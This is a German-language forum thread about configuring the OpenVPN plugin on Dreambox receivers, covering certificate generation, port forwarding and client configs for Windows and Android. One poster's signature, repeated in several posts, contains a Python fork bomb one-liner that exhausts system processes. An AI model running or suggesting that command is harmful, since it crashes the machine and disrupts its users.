OpenVPN

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • OpenVPN

      Wir wollen zwei 7020hd mit VPN verbinden. Haben nun auf beiden Boxen das OpenVPN Plugin installiert. Einer als Server und einer als Client. Leider verbinden sich die beiden nicht? Was muss man tun? Irgendwer ne Ahnung?

      Der Server hat ein tap0 Device mit ner IP. Auf dem Client tut sich gar nix.

    • Das Plugin ist recht simpel start stop und autostart sollten selbstklärend sein die restlichen punkte werden gebraucht um auf der box zertifkate zu erstellen und man kann wählen ob diese box als server oder client geplannt ist was nur beim installieren der zertifikate und configs gebraucht wird. Erstellt werden immer alle configs und zertifakte für server und klient die anzahl der klients könnt ihr auch einstellen. Ihr müsst nur die jeweiligen configs und zertifikate auf der gegenstelle installieren wo ein openvpn läuft.Und die zertifikate die erstellt werden sind untereinander kompatibel wenn ihr wie auch immer neue erstellt müsst ihr alle tauschen vom server und klienten.
      Es nütz nichts wenn ihr auf jeder box welche generiert!!!
      z.b
      Ihr habt 3 dreamboxen auf allen 3 installiert ihr das plugin und nur auf einer box generiert ihr euch zertifikate.Auf dieser box würde ich auch gleich den server installieren danach geht ihr auf der box in /etc/openvpn/easy-rsa2/keys per ftp da liegen auch fertige configs und certifikate für euere klienten die iher auf den anderen boxen nach /etc/openvpn kopiert.Welche datein ihr braucht steht in der jeweilligen config.
      ist das erledigt server starten und dann die clients.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

    • Im aktuellen Unstable hab ich noch ein paar erleichterungen eingebaut die zertifikate werden nun klient und server weise gepackt und liegen im etc/openvpn und man kann sie beim drücken auf menu oder info wahlweise lokal installieren oder per ftp auf ne andere box schieben.
      Und da es net viele user gibt die sowas benutzen wäre ich dir dankbar wenn du ab und an hier mal ne rückmeldung gibst das man evtl was verbessern kann.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

    • kinnas.. ich habe openvpn schon seit 3 jahren auf den ersten releases laufen. die bin´s unterscheiden sich nicht weit von den exp.´s von dmm.

      ich möchte eucht einfach an dieser stelle einfach ermutigen die vpn wiki zu lesen.

      glaubt mir, es sich wirklich einfach einfach eifanch.

    • Da war der sparks schneller. :)
      Ich wollte es gerade auch schreiben. ;) Erst mal Beitrag lesen bevor man irgendwas daher posted.
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)

    • Welchen OpenVPN Client kann man eigentlich PC-Seitig verwenden?

      Will Dreambox als VPN-Server und nen PC/Laptop als VPN-Client verwenden.

      Funktionieren die Clients von openvpn.net bzw. openvpn.se? Sollte ja eigentlich auch mit einem iOS/Android Smartphone funktionieren, oder?

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Gotsche ()

    • Quellcode

      1. root@dm8000:~# cd /etc/openvpn
      2. root@dm8000:/etc/openvpn# ll
      3. drwxr-xr-x 5 root root 0 Jan 30 20:34 .
      4. drwxr-xr-x 30 root root 0 Jan 30 20:46 ..
      5. -rw-r--r-- 1 root root 3742 Jan 30 20:34 20120130202946_Client1.tar.gz
      6. -rw-r--r-- 1 root root 3748 Jan 30 20:34 20120130202946_Client2.tar.gz
      7. -rw-r--r-- 1 root root 3744 Jan 30 20:34 20120130202946_Client3.tar.gz
      8. -rw-r--r-- 1 root root 3743 Jan 30 20:34 20120130202946_Client4.tar.gz
      9. -rw-r--r-- 1 root root 3742 Jan 30 20:34 20120130202946_Client5.tar.gz
      10. -rw-r--r-- 1 root root 3750 Jan 30 20:34 20120130202946_Client6.tar.gz
      11. -rw-r--r-- 1 root root 3747 Jan 30 20:34 20120130202946_Client7.tar.gz
      12. -rw-r--r-- 1 root root 3747 Jan 30 20:34 20120130202946_Client8.tar.gz
      13. -rw-r--r-- 1 root root 4270 Jan 30 20:34 20120130202946_server.tar.gz
      Alles anzeigen


      So sieht das mom aus nach dem Zertifakt erstellen die einzelnen pakete kann man lokal installieren
      oder aber per ftp auf ne andere box schieben und dann dort lokal installieren noch einfacher geht nicht.
      Nicht vergessen für jede einzelne box ein client paket und die server box kriegt nur das server paket.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

    • Also, nachdem ich schon mal erfolgreich einen openVPN auf Ubuntu installiert habe, habe ich es mal auf der DM8000 versucht. Ich benutzte dazu die stable-Version.
      openVPN installieren, Keys erzeugen und den Client (auf Windows 7) einzurichten waren recht einfach. Die Verbindung klappte auch und ich bekamm einen Client auf 10.8.0.2, den ich auch anpingen konnte.

      Aber wenn ich jetzt auf meinen Browser 10.8.0.2 angebe, erwarte ich, dass dann Web-IF erscheint, statt dessen bekamm ich einen Verbindungsfehler. Auch die Samba-Laufwerke konnte ich über 10.8.0.2 nicht ansprechen. So ist das natürlich nicht zu gebrauchen und mir fehlen das die spezifischen Kentnisse, um den Fehler zu suchen.

    • Original von rickle
      Aber wenn ich jetzt auf meinen Browser 10.8.0.2 angebe, erwarte ich, dass dann Web-IF erscheint, statt dessen bekamm ich einen Verbindungsfehler. Auch die Samba-Laufwerke konnte ich über 10.8.0.2 nicht ansprechen. So ist das natürlich nicht zu gebrauchen und mir fehlen das die spezifischen Kentnisse, um den Fehler zu suchen.


      Jetzt wo ich es schreib, sehe ich meinen Fehler. Der Server liegt natürlich auf 10.8.0.1.
      Sorry, das muss ich heut abend nochmal probieren.

    • Ja, wie vermutet, hab ich nur die falsche IP-Adresse verwendet. Jetzt klappt alles.
      Die Installation war wirklich einfach, nach 5 Minuten stand die Verbindung.
      Für die, die noch keine Erfahrung mit der Konfiguration von VPN haben, hier ein paar Tipps, die vielleicht helfen.

      1. Ihr braucht eine DynDns-Webadresse.

      2. In der Konfiguration euren Routers müßt ihr ausenkommende Daten auf Port 1194 auf eure Dreambox umleiten, ebenfalls auf Port 1194. Aber Achtung, das Protokoll ist UDP (nicht TCP).

      3. Nachdem ihr das opbenVPN-Plugin installiert habt, könnt ihr unter dem Menü Nenigma2 Services/Systen Tools/openVPN die Zertifikate generieren. Zuvor müßt ihr unter Client Remote Address eure DydDNS-Adresse eintragen.

      4. Wenn die Keys erzeugt sind, könnt Ihr diese auf den Client-Rechner kopieren und den VPN-Client konfigurieren. Im Falle, dass ihr opbenVPN GUI als Client benutz müßt ihr die Key-Dateien (ca.crt, Client1.crt und Client1.key ihr findet sie in der Dreambox unter /etc/openvpn/easy-rsa/keys) in den config Ordner des Installations-Verzeichnis des Clients (z.B. C:\Programme\OpenVPN\config) kopieren.
      Achtung: Wie oben beschrieben sind die Key-Dateien in der unstable-Verion in /tec/openvpn abgelegt.

      5. Jetzt braucht ihr noch eine Konfigurationsdatei für den VPN-Client. Die in den Key-Verzeichnis liegende Datei Client1.conf hat bei meinem Client nicht funktioniert. Falls ihr openVPN GUI verwendet, hänge ich euch eine Konfigurationsdatei an. Ihr müßt dort nur noch eure DynDNS-Adresse eintragen (sucht nach den Eintrag remote). Danach folgt ein Leerzeichen und 1194.
      (Beispiel: remote meine.dyndns.ip 1194.

      Die Konfigurationsdatei kommt auch in den config-Ordner.

      6. Den Client starten (es erscheint ein Programmsymbol auf der Taskleiste) - dann rechte Maus auf das Programmsymbol und Connect wählen. Wenn das Symbol dann irgendwann grün wird, ist alles OK.

      Am Ende könnt ihr die Dreambox mit der IP-Adresse 10.8.0.1 erreichen.

      Viel Spaß
      Dateien

      • client.zip

        (1,69 kB, 1.209 mal heruntergeladen, zuletzt: )

    • Ich hab die configs für dreamboxen und linux rechner gemacht es kann sein das der win client da bischen anders iss.
      Aber gut du hast ne config gepostet die geht das schon mal sehr gut damit kann man schon mal ne weitere klient gruppe mit einbeziehen.
      Schon hatt man was vernünftiges am laufen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

    • Original von kati910
      Ich hab die configs für dreamboxen und linux rechner gemacht es kann sein das der win client da bischen anders iss.
      Aber gut du hast ne config gepostet die geht das schon mal sehr gut damit kann man schon mal ne weitere klient gruppe mit einbeziehen.
      Schon hatt man was vernünftiges am laufen.


      Ich hab mir die erzeugte Client1.conf nochmal näher angescheut. Sie funktioniert auch, es müssen nur die Pfade zu den Key-Dateien angepasst werden, dann funktionieren die auch bei mir.
      Allerdings muß die Endung bei openVPN GUI ovpn sein. Also wenn man die Datei in client.ovpn umbenennt und die Pfade anpasst, kann ich sie verwenden.

    • Hallo zusammen,

      1. kann mir jemand die letzten Zeilen erklären wegen der:

      Upload IP:
      Upload Benutzername:
      Upload Passwort:
      Upload Port:

      habe bisher das Stable OpenVPN Plugin genutzt für was brauch ich die Zeilen?

      2. Wenn ich auf Menü drücke und die Serverdatei installieren möchte dann tut ers bei mir nicht. Warum geht das nicht?

      Habs jetzt manuell installiert aber wieso gehts nicht?

      Vielen Dank
      Schwitz_Wimzi
      Bilder

      • Openvpn screenshot1.png

        22,38 kB, 720×405, 5.374 mal angesehen
      Dreambox DM 8000 HD PVR
      Dreambox DM 7020 HD
      Dreambox DM 500 HD
      Dreambox DM 800HD se

      NAS Synology DS 210j

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Schwitz_Wimzi ()

    • Ich bin zu blöd irgendwie dazu :(

      Ich habe OpenVPN installiert, ich habe ein ca.crt und eine openvpn.conf. Habe die ca.crt in einen erstellten Ordner etc/openvpn/key kopiert. Die openvpn.conf ins etc/openvpn.
      Bloss ich muss irgendwo einen Denkfehler haben, weiss da nicht mehr weiter, wie und was. 8o
      Nichts Schein, wie es ist.

    • Falls jemand ne einfache verbindung braucht zb zum android handy ohne root

      Dreambox
      cd /etc/openvpn
      openvpn --genkey --secret static.key

      #config für die dreambox nach /etc/openvpn als z.b myvpn.conf
      dev tun0
      ifconfig 10.9.8.1 10.9.8.2
      secret /etc/openvpn/static.key
      comp-lzo


      #config für das android nach /mnt/sdcard als z.b myvpn.ovpn

      remote your-server.org
      dev tun0
      ifconfig 10.9.8.2 10.9.8.1
      secret /mnt/sdcard/static.key

      Der Generierte key bleibt auf der box und eine kopie aufs handy bei der android config pfad anpassen und openvpn connect aus dem market installieren das brauch kein root.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

    • Original von aliare
      verstehe ich das richtig, dass wenn ich in die client-config meine dyndns-adresse, meinen benutzernamen und kennwort eintrage, zu einen pptp-server verbinden kann?

      das nimmt mich auch wunder! ich muss zu einem pptp server verbinden. finde absolut nicht's in google für newnigma2 dm8000